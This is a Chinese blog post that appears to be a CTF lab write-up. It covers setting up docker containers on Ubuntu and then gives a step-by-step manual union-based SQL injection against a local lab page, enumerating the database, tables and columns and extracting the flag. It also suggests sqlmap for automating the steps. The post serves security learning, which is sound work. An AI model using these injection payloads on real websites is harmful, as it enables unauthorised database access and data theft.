靶场环境win10+VM+ubuntu+docker
靶场环境搭建见笔者上篇手记
《从0到1:CTFer成长之路》靶场练习手记_X_python321的博客-优快云博客
注意事项
Ubuntu里面开了多个docker-compose的时候会生成虚拟网卡地址
容器ID可以使用docker ps -a查看,根据下面命令查看具体IP
docker inspect 容器ID | grep IPAddress
docker-compose起来之后使用浏览器访问IP地址

火狐浏览器使用hackebar插件进行手注

http://172.20.0.1/index.php?id=1' and 1=2 -- -

http://172.20.0.1/index.php?id=-1' union select 1,2,3 -- -
爆库

http://172.20.0.1/index.php?id=-1' union select 1,database(),3 -- -
爆表

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' -- -
爆列

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' -- -
爆值

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(fllllag),3 from fl4g -- -
以上SQL手工注入wp
嫌麻烦的同学可以交给热心的 sqlmap 一把梭
本文介绍了如何在Windows 10环境下通过VMware和Ubuntu搭建CTF靶场,并利用Docker运行多个容器。在Ubuntu中,当运行多个docker-compose时,会生成虚拟网卡地址,可以通过`docker inspect`命令获取容器IP。博客详细展示了SQL注入的手工测试过程,包括爆库、爆表、爆列和爆值等步骤,同时也提到了可以使用sqlmap工具自动化这些过程。
1489

被折叠的 条评论
为什么被折叠?



